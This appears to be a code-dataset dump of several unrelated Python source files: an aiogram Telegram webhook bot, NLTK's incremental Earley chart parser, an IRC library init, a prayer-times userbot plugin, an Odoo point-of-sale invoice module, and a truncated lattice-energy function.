ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a4b81987d3e067e2204ef50a05aa0607fb45971 | import asyncio
import ssl
import sys
from aiohttp import web
import aiogram
from aiogram import Bot, types, Version
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.dispatcher import Dispatcher
from aiogram.dispatcher.webhook import get_new_configured_app, SendMessage
from aiogram.types import ChatType, ParseMode, ContentType
from aiogram.utils.markdown import hbold, bold, text, link
TOKEN = 'BOT TOKEN HERE'
WEBHOOK_HOST = 'example.com' # Domain name or IP addres which your bot is located.
WEBHOOK_PORT = 443 # Telegram Bot API allows only for usage next ports: 443, 80, 88 or 8443
WEBHOOK_URL_PATH = '/webhook' # Part of URL
# This options needed if you use self-signed SSL certificate
# Instructions: https://core.telegram.org/bots/self-signed
WEBHOOK_SSL_CERT = './webhook_cert.pem' # Path to the ssl certificate
WEBHOOK_SSL_PRIV = './webhook_pkey.pem' # Path to the ssl private key
WEBHOOK_URL = f"https://{WEBHOOK_HOST}:{WEBHOOK_PORT}{WEBHOOK_URL_PATH}"
# Web app settings:
# Use LAN address to listen webhooks
# User any available port in range from 1024 to 49151 if you're using proxy, or WEBHOOK_PORT if you're using direct webhook handling
WEBAPP_HOST = 'localhost'
WEBAPP_PORT = 3001
BAD_CONTENT = ContentType.PHOTO & ContentType.DOCUMENT & ContentType.STICKER & ContentType.AUDIO
loop = asyncio.get_event_loop()
bot = Bot(TOKEN, loop=loop)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
async def cmd_start(message: types.Message):
# Yep. aiogram allows to respond into webhook.
# https://core.telegram.org/bots/api#making-requests-when-getting-updates
return SendMessage(chat_id=message.chat.id, text='Hi from webhook!',
reply_to_message_id=message.message_id)
async def cmd_about(message: types.Message):
# In this function markdown utils are userd for formatting message text
return SendMessage(message.chat.id, text(
bold('Hi! I\'m just a simple telegram bot.'),
'',
text('I\'m powered by', bold('Python', Version(*sys.version_info[:]))),
text('With', link(text('aiogram', aiogram.VERSION), 'https://github.com/aiogram/aiogram')),
sep='\n'
), parse_mode=ParseMode.MARKDOWN)
async def cancel(message: types.Message):
# Get current state context
state = dp.current_state(chat=message.chat.id, user=message.from_user.id)
# If current user in any state - cancel it.
if await state.get_state() is not None:
await state.set_state(state=None)
return SendMessage(message.chat.id, 'Current action is canceled.')
# Otherwise do nothing
async def unknown(message: types.Message):
"""
Handler for unknown messages.
"""
return SendMessage(message.chat.id, f"I don\'t know what to do with content type `{message.content_type()}`. Sorry :c")
async def cmd_id(message: types.Message):
"""
Return info about user.
"""
if message.reply_to_message:
target = message.reply_to_message.from_user
chat = message.chat
elif message.forward_from and message.chat.type == ChatType.PRIVATE:
target = message.forward_from
chat = message.forward_from or message.chat
else:
target = message.from_user
chat = message.chat
result_msg = [hbold('Info about user:'),
f"First name: {target.first_name}"]
if target.last_name:
result_msg.append(f"Last name: {target.last_name}")
if target.username:
result_msg.append(f"Username: {target.mention}")
result_msg.append(f"User ID: {target.id}")
result_msg.extend([hbold('Chat:'),
f"Type: {chat.type}",
f"Chat ID: {chat.id}"])
if chat.type != ChatType.PRIVATE:
result_msg.append(f"Title: {chat.title}")
else:
result_msg.append(f"Title: {chat.full_name}")
return SendMessage(message.chat.id, '\n'.join(result_msg), reply_to_message_id=message.message_id,
parse_mode=ParseMode.HTML)
async def on_startup(app):
# Demonstrate one of the available methods for registering handlers
# This command available only in main state (state=None)
dp.register_message_handler(cmd_start, commands=['start'])
# This handler is available in all states at any time.
dp.register_message_handler(cmd_about, commands=['help', 'about'], state='*')
dp.register_message_handler(unknown, content_types=BAD_CONTENT,
func=lambda message: message.chat.type == ChatType.PRIVATE)
# You are able to register one function handler for multiple conditions
dp.register_message_handler(cancel, commands=['cancel'], state='*')
dp.register_message_handler(cancel, func=lambda message: message.text.lower().strip() in ['cancel'], state='*')
dp.register_message_handler(cmd_id, commands=['id'], state='*')
dp.register_message_handler(cmd_id, func=lambda message: message.forward_from or
message.reply_to_message and
message.chat.type == ChatType.PRIVATE, state='*')
# Get current webhook status
webhook = await bot.get_webhook_info()
# If URL is bad
if webhook.url != WEBHOOK_URL:
# If URL doesnt match current - remove webhook
if not webhook.url:
await bot.delete_webhook()
# Set new URL for webhook
await bot.set_webhook(WEBHOOK_URL, certificate=open(WEBHOOK_SSL_CERT, 'rb'))
# If you want to use free certificate signed by LetsEncrypt you need to set only URL without sending certificate.
async def on_shutdown(app):
"""
Graceful shutdown. This method is recommended by aiohttp docs.
"""
# Remove webhook.
await bot.delete_webhook()
# Close Redis connection.
await dp.storage.close()
await dp.storage.wait_closed()
if __name__ == '__main__':
# Get instance of :class:`aiohttp.web.Application` with configured router.
app = get_new_configured_app(dispatcher=dp, path=WEBHOOK_URL_PATH)
# Setup event handlers.
app.on_startup.append(on_startup)
app.on_shutdown.append(on_shutdown)
# Generate SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.load_cert_chain(WEBHOOK_SSL_CERT, WEBHOOK_SSL_PRIV)
# Start web-application.
web.run_app(app, host=WEBAPP_HOST, port=WEBAPP_PORT, ssl_context=context)
# Note:
# If you start your bot using nginx or Apache web server, SSL context is not required.
# Otherwise you need to set `ssl_context` parameter.
|
py | 1a4b81ce1a50524f2390040e9991b59344fce152 | # -*- coding: utf-8 -*-
# Natural Language Toolkit: An Incremental Earley Chart Parser
#
# Copyright (C) 2001-2014 NLTK Project
# Author: Peter Ljunglöf <[email protected]>
# Rob Speer <[email protected]>
# Edward Loper <[email protected]>
# Steven Bird <[email protected]>
# Jean Mark Gawron <[email protected]>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Data classes and parser implementations for *incremental* chart
parsers, which use dynamic programming to efficiently parse a text.
A "chart parser" derives parse trees for a text by iteratively adding
\"edges\" to a \"chart\". Each "edge" represents a hypothesis about the tree
structure for a subsequence of the text. The "chart" is a
\"blackboard\" for composing and combining these hypotheses.
A parser is "incremental", if it guarantees that for all i, j where i < j,
all edges ending at i are built before any edges ending at j.
This is appealing for, say, speech recognizer hypothesis filtering.
The main parser class is ``EarleyChartParser``, which is a top-down
algorithm, originally formulated by Jay Earley (1970).
"""
from __future__ import print_function, division
from nltk.compat import xrange
from nltk.parse.chart import (Chart, ChartParser, EdgeI, LeafEdge, LeafInitRule,
BottomUpPredictRule, BottomUpPredictCombineRule,
TopDownInitRule, SingleEdgeFundamentalRule,
EmptyPredictRule,
CachedTopDownPredictRule,
FilteredSingleEdgeFundamentalRule,
FilteredBottomUpPredictCombineRule)
from nltk.parse.featurechart import (FeatureChart, FeatureChartParser,
FeatureTopDownInitRule,
FeatureTopDownPredictRule,
FeatureEmptyPredictRule,
FeatureBottomUpPredictRule,
FeatureBottomUpPredictCombineRule,
FeatureSingleEdgeFundamentalRule)
#////////////////////////////////////////////////////////////
# Incremental Chart
#////////////////////////////////////////////////////////////
class IncrementalChart(Chart):
def initialize(self):
# A sequence of edge lists contained in this chart.
self._edgelists = tuple([] for x in self._positions())
# The set of child pointer lists associated with each edge.
self._edge_to_cpls = {}
# Indexes mapping attribute values to lists of edges
# (used by select()).
self._indexes = {}
def edges(self):
return list(self.iteredges())
def iteredges(self):
return (edge for edgelist in self._edgelists for edge in edgelist)
def select(self, end, **restrictions):
edgelist = self._edgelists[end]
# If there are no restrictions, then return all edges.
if restrictions=={}: return iter(edgelist)
# Find the index corresponding to the given restrictions.
restr_keys = sorted(restrictions.keys())
restr_keys = tuple(restr_keys)
# If it doesn't exist, then create it.
if restr_keys not in self._indexes:
self._add_index(restr_keys)
vals = tuple(restrictions[key] for key in restr_keys)
return iter(self._indexes[restr_keys][end].get(vals, []))
def _add_index(self, restr_keys):
# Make sure it's a valid index.
for key in restr_keys:
if not hasattr(EdgeI, key):
raise ValueError('Bad restriction: %s' % key)
# Create the index.
index = self._indexes[restr_keys] = tuple({} for x in self._positions())
# Add all existing edges to the index.
for end, edgelist in enumerate(self._edgelists):
this_index = index[end]
for edge in edgelist:
vals = tuple(getattr(edge, key)() for key in restr_keys)
this_index.setdefault(vals, []).append(edge)
def _register_with_indexes(self, edge):
end = edge.end()
for (restr_keys, index) in self._indexes.items():
vals = tuple(getattr(edge, key)() for key in restr_keys)
index[end].setdefault(vals, []).append(edge)
def _append_edge(self, edge):
self._edgelists[edge.end()].append(edge)
def _positions(self):
return xrange(self.num_leaves() + 1)
class FeatureIncrementalChart(IncrementalChart, FeatureChart):
def select(self, end, **restrictions):
edgelist = self._edgelists[end]
# If there are no restrictions, then return all edges.
if restrictions=={}: return iter(edgelist)
# Find the index corresponding to the given restrictions.
restr_keys = sorted(restrictions.keys())
restr_keys = tuple(restr_keys)
# If it doesn't exist, then create it.
if restr_keys not in self._indexes:
self._add_index(restr_keys)
vals = tuple(self._get_type_if_possible(restrictions[key])
for key in restr_keys)
return iter(self._indexes[restr_keys][end].get(vals, []))
def _add_index(self, restr_keys):
# Make sure it's a valid index.
for key in restr_keys:
if not hasattr(EdgeI, key):
raise ValueError('Bad restriction: %s' % key)
# Create the index.
index = self._indexes[restr_keys] = tuple({} for x in self._positions())
# Add all existing edges to the index.
for end, edgelist in enumerate(self._edgelists):
this_index = index[end]
for edge in edgelist:
vals = tuple(self._get_type_if_possible(getattr(edge, key)())
for key in restr_keys)
this_index.setdefault(vals, []).append(edge)
def _register_with_indexes(self, edge):
end = edge.end()
for (restr_keys, index) in self._indexes.items():
vals = tuple(self._get_type_if_possible(getattr(edge, key)())
for key in restr_keys)
index[end].setdefault(vals, []).append(edge)
#////////////////////////////////////////////////////////////
# Incremental CFG Rules
#////////////////////////////////////////////////////////////
class CompleteFundamentalRule(SingleEdgeFundamentalRule):
def _apply_incomplete(self, chart, grammar, left_edge):
end = left_edge.end()
# When the chart is incremental, we only have to look for
# empty complete edges here.
for right_edge in chart.select(start=end, end=end,
is_complete=True,
lhs=left_edge.nextsym()):
new_edge = left_edge.move_dot_forward(right_edge.end())
if chart.insert_with_backpointer(new_edge, left_edge, right_edge):
yield new_edge
class CompleterRule(CompleteFundamentalRule):
_fundamental_rule = CompleteFundamentalRule()
def apply(self, chart, grammar, edge):
if not isinstance(edge, LeafEdge):
for new_edge in self._fundamental_rule.apply(chart, grammar, edge):
yield new_edge
class ScannerRule(CompleteFundamentalRule):
_fundamental_rule = CompleteFundamentalRule()
def apply(self, chart, grammar, edge):
if isinstance(edge, LeafEdge):
for new_edge in self._fundamental_rule.apply(chart, grammar, edge):
yield new_edge
class PredictorRule(CachedTopDownPredictRule):
pass
class FilteredCompleteFundamentalRule(FilteredSingleEdgeFundamentalRule):
def apply(self, chart, grammar, edge):
# Since the Filtered rule only works for grammars without empty productions,
# we only have to bother with complete edges here.
if edge.is_complete():
for new_edge in self._apply_complete(chart, grammar, edge):
yield new_edge
#////////////////////////////////////////////////////////////
# Incremental FCFG Rules
#////////////////////////////////////////////////////////////
class FeatureCompleteFundamentalRule(FeatureSingleEdgeFundamentalRule):
def _apply_incomplete(self, chart, grammar, left_edge):
fr = self._fundamental_rule
end = left_edge.end()
# When the chart is incremental, we only have to look for
# empty complete edges here.
for right_edge in chart.select(start=end, end=end,
is_complete=True,
lhs=left_edge.nextsym()):
for new_edge in fr.apply(chart, grammar, left_edge, right_edge):
yield new_edge
class FeatureCompleterRule(CompleterRule):
_fundamental_rule = FeatureCompleteFundamentalRule()
class FeatureScannerRule(ScannerRule):
_fundamental_rule = FeatureCompleteFundamentalRule()
class FeaturePredictorRule(FeatureTopDownPredictRule):
pass
#////////////////////////////////////////////////////////////
# Incremental CFG Chart Parsers
#////////////////////////////////////////////////////////////
EARLEY_STRATEGY = [LeafInitRule(),
TopDownInitRule(),
CompleterRule(),
ScannerRule(),
PredictorRule()]
TD_INCREMENTAL_STRATEGY = [LeafInitRule(),
TopDownInitRule(),
CachedTopDownPredictRule(),
CompleteFundamentalRule()]
BU_INCREMENTAL_STRATEGY = [LeafInitRule(),
EmptyPredictRule(),
BottomUpPredictRule(),
CompleteFundamentalRule()]
BU_LC_INCREMENTAL_STRATEGY = [LeafInitRule(),
EmptyPredictRule(),
BottomUpPredictCombineRule(),
CompleteFundamentalRule()]
LC_INCREMENTAL_STRATEGY = [LeafInitRule(),
FilteredBottomUpPredictCombineRule(),
FilteredCompleteFundamentalRule()]
class IncrementalChartParser(ChartParser):
"""
An *incremental* chart parser implementing Jay Earley's
parsing algorithm:
| For each index end in [0, 1, ..., N]:
| For each edge such that edge.end = end:
| If edge is incomplete and edge.next is not a part of speech:
| Apply PredictorRule to edge
| If edge is incomplete and edge.next is a part of speech:
| Apply ScannerRule to edge
| If edge is complete:
| Apply CompleterRule to edge
| Return any complete parses in the chart
"""
def __init__(self, grammar, strategy=BU_LC_INCREMENTAL_STRATEGY,
trace=0, trace_chart_width=50,
chart_class=IncrementalChart):
"""
Create a new Earley chart parser, that uses ``grammar`` to
parse texts.
:type grammar: CFG
:param grammar: The grammar used to parse texts.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
and higher numbers will produce more verbose tracing
output.
:type trace_chart_width: int
:param trace_chart_width: The default total width reserved for
the chart in trace output. The remainder of each line will
be used to display edges.
:param chart_class: The class that should be used to create
the charts used by this parser.
"""
self._grammar = grammar
self._trace = trace
self._trace_chart_width = trace_chart_width
self._chart_class = chart_class
self._axioms = []
self._inference_rules = []
for rule in strategy:
if rule.NUM_EDGES == 0:
self._axioms.append(rule)
elif rule.NUM_EDGES == 1:
self._inference_rules.append(rule)
else:
raise ValueError("Incremental inference rules must have "
"NUM_EDGES == 0 or 1")
def chart_parse(self, tokens, trace=None):
if trace is None: trace = self._trace
trace_new_edges = self._trace_new_edges
tokens = list(tokens)
self._grammar.check_coverage(tokens)
chart = self._chart_class(tokens)
grammar = self._grammar
# Width, for printing trace edges.
trace_edge_width = self._trace_chart_width // (chart.num_leaves() + 1)
if trace: print(chart.pp_leaves(trace_edge_width))
for axiom in self._axioms:
new_edges = list(axiom.apply(chart, grammar))
trace_new_edges(chart, axiom, new_edges, trace, trace_edge_width)
inference_rules = self._inference_rules
for end in range(chart.num_leaves()+1):
if trace > 1: print("\n* Processing queue:", end, "\n")
agenda = list(chart.select(end=end))
while agenda:
edge = agenda.pop()
for rule in inference_rules:
new_edges = list(rule.apply(chart, grammar, edge))
trace_new_edges(chart, rule, new_edges, trace, trace_edge_width)
for new_edge in new_edges:
if new_edge.end()==end:
agenda.append(new_edge)
return chart
class EarleyChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, EARLEY_STRATEGY, **parser_args)
pass
class IncrementalTopDownChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, TD_INCREMENTAL_STRATEGY, **parser_args)
class IncrementalBottomUpChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, BU_INCREMENTAL_STRATEGY, **parser_args)
class IncrementalBottomUpLeftCornerChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
IncrementalChartParser.__init__(self, grammar, BU_LC_INCREMENTAL_STRATEGY, **parser_args)
class IncrementalLeftCornerChartParser(IncrementalChartParser):
def __init__(self, grammar, **parser_args):
if not grammar.is_nonempty():
raise ValueError("IncrementalLeftCornerParser only works for grammars "
"without empty productions.")
IncrementalChartParser.__init__(self, grammar, LC_INCREMENTAL_STRATEGY, **parser_args)
#////////////////////////////////////////////////////////////
# Incremental FCFG Chart Parsers
#////////////////////////////////////////////////////////////
EARLEY_FEATURE_STRATEGY = [LeafInitRule(),
FeatureTopDownInitRule(),
FeatureCompleterRule(),
FeatureScannerRule(),
FeaturePredictorRule()]
TD_INCREMENTAL_FEATURE_STRATEGY = [LeafInitRule(),
FeatureTopDownInitRule(),
FeatureTopDownPredictRule(),
FeatureCompleteFundamentalRule()]
BU_INCREMENTAL_FEATURE_STRATEGY = [LeafInitRule(),
FeatureEmptyPredictRule(),
FeatureBottomUpPredictRule(),
FeatureCompleteFundamentalRule()]
BU_LC_INCREMENTAL_FEATURE_STRATEGY = [LeafInitRule(),
FeatureEmptyPredictRule(),
FeatureBottomUpPredictCombineRule(),
FeatureCompleteFundamentalRule()]
class FeatureIncrementalChartParser(IncrementalChartParser, FeatureChartParser):
def __init__(self, grammar,
strategy=BU_LC_INCREMENTAL_FEATURE_STRATEGY,
trace_chart_width=20,
chart_class=FeatureIncrementalChart,
**parser_args):
IncrementalChartParser.__init__(self, grammar,
strategy=strategy,
trace_chart_width=trace_chart_width,
chart_class=chart_class,
**parser_args)
class FeatureEarleyChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, EARLEY_FEATURE_STRATEGY, **parser_args)
class FeatureIncrementalTopDownChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, TD_INCREMENTAL_FEATURE_STRATEGY, **parser_args)
class FeatureIncrementalBottomUpChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, BU_INCREMENTAL_FEATURE_STRATEGY, **parser_args)
class FeatureIncrementalBottomUpLeftCornerChartParser(FeatureIncrementalChartParser):
def __init__(self, grammar, **parser_args):
FeatureIncrementalChartParser.__init__(self, grammar, BU_LC_INCREMENTAL_FEATURE_STRATEGY, **parser_args)
#////////////////////////////////////////////////////////////
# Demonstration
#////////////////////////////////////////////////////////////
def demo(print_times=True, print_grammar=False,
print_trees=True, trace=2,
sent='I saw John with a dog with my cookie', numparses=5):
"""
A demonstration of the Earley parsers.
"""
import sys, time
from nltk.parse.chart import demo_grammar
# The grammar for ChartParser and SteppingChartParser:
grammar = demo_grammar()
if print_grammar:
print("* Grammar")
print(grammar)
# Tokenize the sample sentence.
print("* Sentence:")
print(sent)
tokens = sent.split()
print(tokens)
print()
# Do the parsing.
earley = EarleyChartParser(grammar, trace=trace)
t = time.clock()
chart = earley.chart_parse(tokens)
parses = list(chart.parses(grammar.start()))
t = time.clock()-t
# Print results.
if numparses:
assert len(parses)==numparses, 'Not all parses found'
if print_trees:
for tree in parses: print(tree)
else:
print("Nr trees:", len(parses))
if print_times:
print("Time:", t)
if __name__ == '__main__': demo()
|
py | 1a4b81f0759c582c3289f80f4c3f50560c0ee7d8 | #!/usr/bin/python3
# Copyright (c) 2016-2017, henry232323
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""A small, simple irc lib for python suitable for bots, clients and anything else.
For more information and documentation about the original package:
http://code.google.com/p/oyoyo/
For documentation on trioyoyo: http://trioyoyo.typheus.me/
"""
from .helpers import HelperClient
from .client import IRCClient, CommandClient
from .cmdhandler import protected, CommandHandler, DefaultCommandHandler, DefaultBotCommandHandler, BotCommandHandler
from . import _oyoyo
from ._oyoyo.parse import parse_nick, parse_raw_irc_command
from ._oyoyo.ircevents import all_events, generated_events, protocol_events, numeric_events
from ._oyoyo.cmdhandler import CommandError, NoSuchCommandError, ProtectedCommandError, IRCClientError
|
py | 1a4b83006188808151645c6f6101034af162ff93 | # ported from uniborg
# https://github.com/muhammedfurkan/UniBorg/blob/master/stdplugins/ezanvakti.py
import json
import requests
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP
from userbot.modules.sql_helper.globals import gvarstatus
from userbot.utils import edit_delete, edit_or_reply, man_cmd
@man_cmd(pattern="adzan(?:\s|$)([\s\S]*)")
async def get_adzan(adzan):
"Shows you the Islamic prayer times of the given city name"
input_str = adzan.pattern_match.group(1)
LOKASI = gvarstatus("WEATHER_DEFCITY") or "Jakarta" if not input_str else input_str
url = f"http://muslimsalat.com/{LOKASI}.json?key=bd099c5825cbedb9aa934e255a81a5fc"
request = requests.get(url)
if request.status_code != 200:
return await edit_delete(
adzan, f"**Tidak Dapat Menemukan Kota** `{LOCATION}`", 120
)
result = json.loads(request.text)
catresult = f"<b>Jadwal Shalat Hari Ini:</b>\
\n<b>📆 Tanggal </b><code>{result['items'][0]['date_for']}</code>\
\n<b>📍 Kota</b> <code>{result['query']}</code> | <code>{result['country']}</code>\
\n\n<b>Terbit : </b><code>{result['items'][0]['shurooq']}</code>\
\n<b>Subuh : </b><code>{result['items'][0]['fajr']}</code>\
\n<b>Zuhur : </b><code>{result['items'][0]['dhuhr']}</code>\
\n<b>Ashar : </b><code>{result['items'][0]['asr']}</code>\
\n<b>Maghrib : </b><code>{result['items'][0]['maghrib']}</code>\
\n<b>Isya : </b><code>{result['items'][0]['isha']}</code>\
"
await edit_or_reply(adzan, catresult, "html")
CMD_HELP.update(
{
"adzan": f"**Plugin : **`adzan`\
\n\n • **Syntax :** `{cmd}adzan` <nama kota>\
\n • **Function : **Menunjukkan waktu jadwal sholat dari kota yang diberikan.\
"
}
)
|
py | 1a4b831b84f042b77813c59bf3ead356c5ddbdd4 | # Copyright 2017 Artyom Losev
# Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr>
# License MIT (https://opensource.org/licenses/MIT).
from odoo import _, api, fields, models
SO_CHANNEL = "pos_sale_orders"
INV_CHANNEL = "pos_invoices"
class PosOrder(models.Model):
_inherit = "pos.order"
@api.model
def create_from_ui(self, orders):
invoices_to_pay = [o for o in orders if o.get("data").get("invoice_to_pay")]
original_orders = [o for o in orders if o not in invoices_to_pay]
res = super(PosOrder, self).create_from_ui(original_orders)
if invoices_to_pay:
for inv in invoices_to_pay:
self.process_invoice_payment(inv)
return res
@api.model
def process_invoice_payment(self, invoice):
for statement in invoice["data"]["statement_ids"]:
inv_id = invoice["data"]["invoice_to_pay"]["id"]
inv_obj = self.env["account.invoice"].browse(inv_id)
journal_id = statement[2]["journal_id"]
journal = self.env["account.journal"].browse(journal_id)
amount = min(
statement[2]["amount"], # amount payed including change
invoice["data"]["invoice_to_pay"]["residual"], # amount required to pay
)
cashier = invoice["data"]["user_id"]
writeoff_acc_id = False
payment_difference_handling = "open"
vals = {
"journal_id": journal.id,
"payment_method_id": 1,
"payment_date": invoice["data"]["creation_date"],
"communication": invoice["data"]["invoice_to_pay"]["number"],
"invoice_ids": [(4, inv_id, None)],
"payment_type": "inbound",
"amount": amount,
"currency_id": inv_obj.currency_id.id,
"partner_id": invoice["data"]["invoice_to_pay"]["partner_id"][0],
"partner_type": "customer",
"payment_difference_handling": payment_difference_handling,
"writeoff_account_id": writeoff_acc_id,
"pos_session_id": invoice["data"]["pos_session_id"],
"cashier": cashier,
}
payment = self.env["account.payment"].create(vals)
payment.post()
@api.model
def process_invoices_creation(self, sale_order_id):
order = self.env["sale.order"].browse(sale_order_id)
inv_id = order.action_invoice_create()
self.env["account.invoice"].browse(inv_id).action_invoice_open()
return inv_id
class AccountPayment(models.Model):
_inherit = "account.payment"
pos_session_id = fields.Many2one("pos.session", string="POS session")
cashier = fields.Many2one("res.users")
datetime = fields.Datetime(string="Datetime", default=fields.Datetime.now)
class AccountInvoice(models.Model):
_inherit = "account.invoice"
def action_updated_invoice(self):
message = {"channel": INV_CHANNEL, "id": self.id}
self.env["pos.config"].search([])._send_to_channel(INV_CHANNEL, message)
@api.model
def get_invoice_lines_for_pos(self, invoice_ids):
res = []
invoice_lines = self.env["account.invoice.line"].search(
[("invoice_id", "in", invoice_ids)]
)
for l in invoice_lines:
line = {
"invoice_id": l.invoice_id.id,
"id": l.id,
"name": l.name,
"account": l.account_id.name,
"product": l.product_id.name,
"price_unit": l.price_unit,
"qty": l.quantity,
"tax": [tax.name or " " for tax in l.invoice_line_tax_ids],
"discount": l.discount,
"amount": l.price_subtotal,
}
res.append(line)
return res
@api.depends("payment_move_line_ids.amount_residual")
def _get_payment_info_JSON(self):
for record in self:
if not record.payment_move_line_ids:
pass
for move in record.payment_move_line_ids:
if move.payment_id.cashier:
if move.move_id.ref:
move.move_id.ref = "{} by {}".format(
move.move_id.ref, move.payment_id.cashier.name
)
else:
move.move_id.name = "{} by {}".format(
move.move_id.name, move.payment_id.cashier.name
)
data = super(AccountInvoice, self)._get_payment_info_JSON()
return data
class SaleOrder(models.Model):
_inherit = "sale.order"
def action_updated_sale_order(self):
message = {"channel": SO_CHANNEL, "id": self.id}
self.env["pos.config"].search([])._send_to_channel(SO_CHANNEL, message)
@api.model
def get_order_lines_for_pos(self, sale_order_ids):
res = []
order_lines = self.env["sale.order.line"].search(
[("order_id", "in", sale_order_ids)]
)
for l in order_lines:
line = {
"order_id": l.order_id.id,
"id": l.id,
"name": l.name,
"product": l.product_id.name,
"uom_qty": l.product_uom_qty,
"qty_delivered": l.qty_delivered,
"qty_invoiced": l.qty_invoiced,
"tax": [tax.name or " " for tax in l.tax_id],
"discount": l.discount,
"subtotal": l.price_subtotal,
"total": l.price_total,
"invoiceble": (
(l.qty_delivered > 0) or (l.product_id.invoice_policy == "order")
),
}
res.append(line)
return res
class PosConfig(models.Model):
_inherit = "pos.config"
def _get_default_writeoff_account(self):
acc = self.env["account.account"].search([("code", "=", 220000)]).id
return acc if acc else False
show_invoices = fields.Boolean(help="Show invoices in POS", default=True)
show_sale_orders = fields.Boolean(help="Show sale orders in POS", default=True)
pos_invoice_pay_writeoff_account_id = fields.Many2one(
"account.account",
string="Difference Account",
help="The account is used for the difference between due and paid amount",
default=_get_default_writeoff_account,
)
invoice_cashier_selection = fields.Boolean(
string="Select Invoice Cashier",
help="Ask for a cashier when fetch invoices",
defaul=True,
)
sale_order_cashier_selection = fields.Boolean(
string="Select Sale Order Cashier",
help="Ask for a cashier when fetch orders",
defaul=True,
)
class PosSession(models.Model):
_inherit = "pos.session"
session_payments = fields.One2many(
"account.payment",
"pos_session_id",
string="Invoice Payments",
help="Show invoices paid in the Session",
)
session_invoices_total = fields.Float(
"Invoices", compute="_compute_session_invoices_total"
)
def _compute_session_invoices_total(self):
for rec in self:
rec.session_invoices_total = sum(
rec.session_payments.mapped("invoice_ids").mapped("amount_total") + [0]
)
def action_invoice_payments(self):
payments = self.env["account.payment"].search(
[("pos_session_id", "in", self.ids)]
)
invoices = payments.mapped("invoice_ids").ids
domain = [("id", "in", invoices)]
return {
"name": _("Invoice Payments"),
"type": "ir.actions.act_window",
"domain": domain,
"res_model": "account.invoice",
"view_type": "form",
"view_mode": "tree,form",
}
|
py | 1a4b833a5faa8fd3a3ea76fa37942c2da0cf26f1 | import numpy as np
import os
from singlecell.singlecell_functions import hamiltonian
from multicell.graph_adjacency import general_paracrine_field, general_exosome_field
def calc_lattice_energy(lattice, simsetup, field, fs, gamma, search_radius, exosome_remove_ratio,
exosome_string, meanfield, norm=True):
"""
Lattice energy is the multicell hamiltonian
H_multi = [Sum (H_internal)] - gamma * [Sum(interactions)] - fs * [app_field dot Sum(state)]
Returns total energy and the two main terms
"""
M1 = len(lattice)
M2 = len(lattice[0])
num_cells = M1 * M2
assert M1 == M2 # TODO relax
H_multi = 0
H_self = 0
H_pairwise = 0
H_app = 0
# compute self energies and applied field contribution separately
for i in range(M1):
for j in range(M2):
cell = lattice[i][j]
H_self += hamiltonian(cell.get_current_state(), simsetup['J'], field=None, fs=0.0)
if field is not None:
H_app -= fs * np.dot(cell.get_current_state().T, field)
# compute interactions # TODO check validity
# meanfield case
if meanfield:
mf_search_radius = None
# TODO ok that cell is neighbour with self as well? remove diag
mf_neighbours = [[a, b] for a in range(M2) for b in range(M1)]
else:
assert search_radius is not None
for i in range(M1):
for j in range(M2):
cell = lattice[i][j]
if meanfield:
nbr_states_sent, neighbours = cell.get_local_exosome_field(
lattice, mf_search_radius, M1, exosome_string=exosome_string,
exosome_remove_ratio=exosome_remove_ratio, neighbours=mf_neighbours)
if simsetup['FIELD_SEND'] is not None:
nbr_states_sent += cell.get_local_paracrine_field(lattice, neighbours, simsetup)
else:
nbr_states_sent, neighbours = cell.get_local_exosome_field(
lattice, search_radius, M1, exosome_string=exosome_string,
exosome_remove_ratio=exosome_remove_ratio, neighbours=None)
if simsetup['FIELD_SEND'] is not None:
nbr_states_sent += cell.get_local_paracrine_field(lattice, neighbours, simsetup)
"""
nbr_states_sent_01 = (nbr_states_sent + len(neighbours)) / 2.0
field_neighbours = np.dot(simsetup['FIELD_SEND'], nbr_states_sent_01)
print 'Hpair:', i,j, 'adding', np.dot(field_neighbours, cell.get_current_state())
print 'neighbours are', neighbours
print cell.get_current_label(), 'receiving from', \
[lattice[p[0]][p[1]].get_current_label() for p in neighbours]
print 'cell state', cell.get_current_state()
print 'nbr field', nbr_states_sent
print 'nbr field 01', nbr_states_sent_01
print 'field_neighbours', field_neighbours
"""
H_pairwise += np.dot(nbr_states_sent, cell.get_current_state())
H_pairwise_scaled = - H_pairwise * gamma / 2 # divide by two because double-counting neighbours
if norm:
H_self = H_self / num_cells
H_app = H_app / num_cells
